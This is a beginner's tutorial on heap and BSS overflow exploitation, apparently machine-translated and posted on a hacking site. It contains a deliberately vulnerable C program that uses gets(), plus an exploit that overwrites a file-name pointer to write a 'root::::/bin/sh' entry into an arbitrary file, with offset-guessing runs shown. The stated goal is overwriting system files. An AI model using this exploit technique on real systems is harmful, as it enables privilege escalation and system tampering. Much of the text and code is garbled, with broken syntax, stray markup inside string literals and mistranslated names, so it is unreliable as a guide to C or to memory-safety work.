Exploiting Heap Overflow for Beginners -by Mohamed Ahmed.

Sep 11, 2017 07:15 PM

Something simple: overflows for nerds.

Well, we are in front of a computer that is running a program

and we ask ourselves " Why does this machine work? " The truth is that

explaining how it does what the processor does is a bit complex (I got myself to

understand it 4 months of a subject a hard rock ;)but we can

make a rough summary of it: we have a processor that, as its

own name indicates, it only processes the data that is in the memory (or

the hard disk, etc.). "And how does the processor know how to

process a certain data?";

using preprogrammed binary codes which is the next instruction

to execute and with which data it must do it. "And how does the processor know that what

is being processed is a data and not another instruction of the program that should

execute?"; because that the processor does not know, and precisely this fact is what

we are going to take advantage of for our malefic purposes.

Let's see, the memory of a computer, as you all know, is simply a

bunch of records in which you can store 0 or 1's. It consists of nothing

more than that. For example, if we take a very small portion of memory

and see what it contains, it surely looks like this:

--------------------------------------------------------------------------------------------------------

...00101001001010101111010101010001011010100011101010101010101001....

--------------------------------------------------------------------------------------------------------

and what it means to mean all this series of digits is this:

--------------------------------------------------------------------------------------------------------

...00101001001010101111010101010001011010100011101010101010101001....

--------------------------------------------------------------------------------------------------------

instruction | data | data | instruction | instr ...

Since the time of the first computers there was the idea of ??putting

a label (one bit more) in each dataset to differentiate whether the

set in question was an instruction or a data; but at that time

put a bit more was quite expensive and the results of the programs

would be done much more slowly when processing a bit more. In addition, Von Neumman

(a guy who owes much of the concepts of

current computers ) had demonstrated years ago that with a good organization of the

processor and a well-ordered access to memory, there was no need to differentiate

between instructions and data that the processor would respond to a

instruction and would take the data indicated by the instruction,

and as the instruction will always point to a memory area in which

are your data, there was no problem.

Surely the instruction will always point to a memory area

where your data will be? Well .... that would have to be discussed ....

Let's see the stupid example of stack overflow that exists. We have a

variable (that is, one of the 'data' of the instruction) and we execute something

as simple as the programilla this:

code

......

main ()

{

char data20;

....

scanf ("% s", & data);

....

}

....

and the memory would be more or less like this (the x's represent instructions):

.... xxxx | 0000000000 ... 0000000000 | xxxxx ...... xxx | xxxxxxx ...... xxxxxxx | .....

^ ^

the data variable 20 the scanf instruction

as nothing, we already have the game ready. The normal thing is that

when the user is told to enter the text in question to fill in the

data variable 20, they will enter less than 20 characters and then there is no problem; but the

problem appears when you give to put some more. It turns out that the

C language does not check for limits when executing instructions like these, so

what it does is simply to continue accepting characters and saving them in

memory locations adjacent to the data variable 20, more or less

like this:

Case 1:

the user is good people

-------------------------------------------------- --------------------------------

..... I am med0000000000000 | xxxxxxxxxxxxx ... xxxx | .....

-------------------------------------------------- --------------------------------

case 2:

the user is a jaquerrr wanting to do something illegal

----------------------------------------------------------------------------------

..... I am a mohamed jaj | ajajajaxxxxxxxx ... xx | .....

----------------------------------------------------------------------------------

Here we see how the first bits of the

following instruction have been overwritten 20. The normal thing that happens in these cases is that the

processor, when trying to execute that instruction that of course does not match

any valid, of an error and finish the execution of the program.

However, the trick is to overwrite the instruction that follows

data 20 to be something the processor understands. The most usual thing is that it

is overwritten with a jump to another memory location where we have

previously placed a call to a shell so that, instead of executing the

command, a shell is executed that would give us access to the system.

Graphically:

.................................................. ......

................ data20saltoxxxxxxxx ..................

.................................................. ......

.................................................. ......

.................................................. ......

shell

and we will finish executing the program with a brand new shell just

invoked :).

Well, I do not dwell on the subject of overflows;

I suppose you all got the idea. Everything I have said so far

refers to stacks overflows, of which there is a lot of articles

written in both Spanish and Yanki-language, so if you are interested,

you just have to move around the world ... (and not much, this ezine brings all ;)

Heaps overflows.

the previous paragraphs have seen the base of a stack overflow. There

is very complex but has certain curiosities that must be taken into account

account, as for example to find return addresses in the calls

to functions and things like (to know more, the best thing is that you are loyal the

different artists published on the subject). I defend the heaps overflows

for its simplicity and its "purity of lines", as some bad

car advertisement would say. ;)

Of course, to understand what a Heap Overflow is, the first thing

to know is what the Heap is ;). Let's see, a program has two

ways to ask the OS memory to do its job. One of them is the

typical one, which we used before:

char data 20,

so the system would allocate a memory zone identifying it with the

name "data" and size 20 bytes. This is the traditional and

"static" form, that is, if at any point in the program we need

the variable data to be 40 bytes, we can not do it.

The other way, and it is the one that interests us, is that the program asks at

runtime (the other form is called "at compile time") the memory

it needs, then the OS searches for free memory and, if available, is

given to the program. Usually this is done with:

Code:

char * data;

data = (char *) malloc (SIZEofMEMORY);

and the system would return the assigned memory zone in "data" or, if there is no

free, would put data to NULL. Here we see that the variable "data" is no

longer a variable in the "classic" sense of the word and happens to be a

pointer that, as its name indicates, it does point to the first

of a series of positions by heart.

Someone should already be asking "if an overflow consists of

overwriting a memory zone, how will the OS be so silly as to

give us malloc () access to a memory zone that is already being

occupied?". Very simple: the OS is not silly. Well, not quite :). The OS

simply does what we say within limits, so

it will never give us positions that are already used, but nothing prevents us from

moving ourselves through those positions. What we have to take into

account is that, since C does not check that we are writing in

the memory position assigned to us by the OS (if you do not check limits on

variables, the logic is that you do not check things like these either because

two concepts are based on the same thing: write in a site that was not

intended for you), we will always be able to write in another that is

a valid position. That is, if we have 2 memory zones (no

need to be consecutive) allocated for two variables, the OS will

allow to write in the second using the first, and vice versa, for the simple

reason that both the first and the second point to areas of memory that

have been identified as "writable" by that type of variables. Let's

see it with an example that is very clear:

code

<++> heap / example1.c 92ca44fdc06aa8f1d800ecf7fe6309

/ *

the simplest possible example of an overflow in the heap zone
based directly on one of w00w00
/

#include

#include

#include

int main ()

{

char data1, data2; / our variables /

unsigned long distance; / * this is the actual memory distance

that are going to have our variables.

if the 2 were in memory zones

consecutive, the distance would be 0 * /

/ request memory allocation. Let's ask for 40 bytes /

dato1 = (char *) malloc (40);

dato2 = (char *) malloc (40);

/ we look at how far they are /

distance = (unsigned long) dato2 - (unsigned long) dato1;

/ * now we fill data2 with a normal chain. memset ()

the only thing that does is fill the position of memory q is passed

with a character * /

memset (dato2, 'P', 40-1), dato2 40-1 = '{jumi * 3 oooooooooooooooolink exploitooooooooooooooooooooooooo }';

printf ("before overwriting:% s \ n", data2);

/ * we overwrite 20 bytes of data2 using the variable data1 and the

distance separating them (just in case this is not 0) * /

memset (data1, '*', (unsigned int) (distance + 20));

/ we checked /

printf ("after overwrite:% s \ n", data2);

return 0;

}

<-->

As we already have it, we execute it and we see how the data pointer1 overwrites

the area that has assigned data2; and the OS allows it for the simple reason

that both zones (the one of data2 and the one that is supposed to use

data1) are of the same type and are initialized in the same way, and since

C does not check the addresses because it is easy to confuse it so that it thinks that

data1 is being written in its place when in fact we are in the data

zone2.

code

...

cafo @ thehost: ~ / nets / heap $ ./example1

Before Overwriting: PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP

after overwriting: ********** PPPPPPPPPPPPPPPPPPP

...

Then the concept has become quite clear, right? We only need

a pointer that is in the heap zone that we can handle to be able

to access all the other pointers in that zone.

Well, both roll over the heap zone and still have not explained what it is. ;)

Heap is simply a zone of dynamic memory where you store

variables by means of the call to malloc (). Possibly those who have

read some book on SO architecture and others, sound the couple

HEAP / BSS. The BSS (and I swear that I have not been able to find anywhere that is what

those damn acronyms mean ;)is simply the memory area

where the global variables are not initialized and the

declared as 'static'. For example, if we want to have memory without

having to initialize it but we want it to behave like the pointer we

used before, we can write something like this:

static char dato1 40;

and would be the equivalent in the zone BSS to the call to malloc () that we did in

the previous programilla.

Well, once you get to this point more than one will ask "And this so

that it serves me?". Well the truth is that if you ask that is that

you still need to catch enough practice with that of the exploits ;). Well, seriously.

You simply have to find a source code (quite usual in these

open source times ...) that uses one of these variables that I have commented

and that allows the user to write it. The typical situation is that the

programmer uses one of these pointers to request data from the user.

Imagine that we have a program that all you do is write what

we tell you in a file that we can not choose. Something like this:

code

<++> heap / example2.c $ d102f90f44986e093acb7a01aef6d723

/ *

example2.c Displays a vulnerable program in the BSS zone
/

#include

int main ()

{

FILE * file;

static char dato1 16, * tmpfile;

tmpfile = "/ tmp / mama.txt"; / we put a temporary any /

printf ("before exploit:% s \ n", tmpfile); / to ensure... /

printf ("Data to be entered in breast.txt: \ n");

gets (data1);

printf ("\ nafter the exploit:% s \ n", tmpfile);

file = fopen (tmpfile, "w");

fputs (data1, file);

fclose (file);

}

<-->

Well, we already have the program in question. At a glance it is not vulnerable

because the only thing that can be modified "externally" is what is written in

the file "mama.txt" so we would not have any problems with

system security , right? I hope so, because we can use what we said before

overwriting pointers for the program to do certain things

undesirable, such as overwriting system files or things like that, and we

can always find files that are useful when overwriting, right?

Well the trick in this case is that the variable where the

name is stored is a pointer whereas where we save the data we

want to put in the file is in the BSS zone, which allows us

play a little with directions. The only thing we have to do is start

testing different approaches to "* tmpfile" from "data1" until we can

completely overwrite the position of * tmpfile with the address of a

file that we are interested in writing. Let's look at an example:

code

<++> heap / exploit2.c $ cc2e106df958188984666213aa549c49

/ * exploit for program example2.c

the original is still in w00w00;)
/

#include

#include

#include

#include

#define BUFSIZE 256

#define ERROR -1

#define DIFF 16

#define VULPROG "./example2"

#define VULFILE "/ tmp / mierdapami"

u_long getesp ()

{

_asm _ ("movl% esp,% eax");

}

int main (int argc, char * argv)

{

u_long addr;

char * mainbuf, buf DIFF + 6 + 1 = "+ + \ t #";

memset (buf, 0, sizeof (buf)), strcpy (buf, "root :::: / bin / sh \ t #");

memset (buf + strlen (buf), 'A', DIFF);

addr = getesp () + atoi (argv 1);

for (i = 0; i
buf DIFF + i = ((u_long) addr >> (i * 8) & 255);

mainbufsize = strlen (buf) + strlen (VULPROG) +

strlen (VULPROG) + strlen (VULFILE) + 13;

mainbuf = (char *) malloc (mainbufsize);

memset (mainbuf, 0, sizeof (mainbuf));

snprintf (mainbuf, mainbufsize-1, "echo '% s' |% s% s \ n",

buf, VULPROG, VULFILE);

system (mainbuf);

return 0;

}

<-->

Well, nothing, here we have a seemingly innocent program like this,

is able to write what we want in any place where

we have writing privileges. We only have to try

different offsets until we overwrite the complete path:

code

code ..

cafo @ thehost: ~ / nets / heap $ ./exploit2 500

before the exploit: /tmp/mama.txt

Data to be entered in breast.txt:

after the exploit: G = spanish

...

ups, we have gone to the area of the environment variables (I did not say that this

kind of exploit can be really useful? ;). Let's continue testing (this more or

less is the game of "sink the fleet" but we have the trick that

We can test millions of values per minute, right? :)

...

cafo @ thehost: ~ / nets / heap $ ./exploit2 400

before the exploit: /tmp/mama.txt

Data to be entered in breast.txt:

after the exploit: üÿ¿

...

Dish, we have gone to the executable code. Too low. Water ;)

...

cafo @ thehost: ~ / nets / heap $ ./exploit2 450

before the exploit: /tmp/mama.txt

Data to be entered in breast.txt:

after the exploit: mplo2

...

/ code

this already sounds better. It is the name of the vulnerable program, so we assume

that we can be in argv 0, right? Water still.

...

cafo @ thehost: ~ / nets / ./exploit2 heap $ 465

before Exploit: /tmp/mama.txt

Data to be entered in mama.txt:

after Exploit: dapami

...

good good good , this is much better. We have just found our

string pointing to the file we want to overwrite. TOUCHED!. Counting

on the fingers it turns out that

code

cafo @ thehost: ~ / nets / heap $ ./exploit2 456

before the exploit: /tmp/mama.txt

Data to enter in breast.txt

after the exploit:

Code:

/ tmp / mierdapami

...

SAND !!! If everything went well, we have in our tmp directory that

file with the info we wanted it to have. Let's see:

...

code

cafo @ thehost: ~ / nets / heap $ cat / tmp / mierdapami

root :::: / bin / sh

cafo @ thehost: ~ / nets / heap

interesting, right? Too bad that same line was not somewhere else ...

but nothing, as this is not for you to do bad things, I let you

investigate.

So far everything has gone very well. Of course, for now we have only

been with my programs, that is, I knew by writing them that they would

be vulnerable. The next thing would be to find out what kind of programs

may be vulnerable or what kind of variables are typically overwritten

by the exploits, but we'll leave that for the second part of the article ...

greetings

Exploiting Heap Overflow for Beginners -by Mohamed Ahmed.

Related Articles

How to Use Zero-Width Characters to Hide Secret Messages in Text (& Even Reveal Leaks)

How to Hide DDE-Based Attacks in MS Word

Comments

No Comments Exist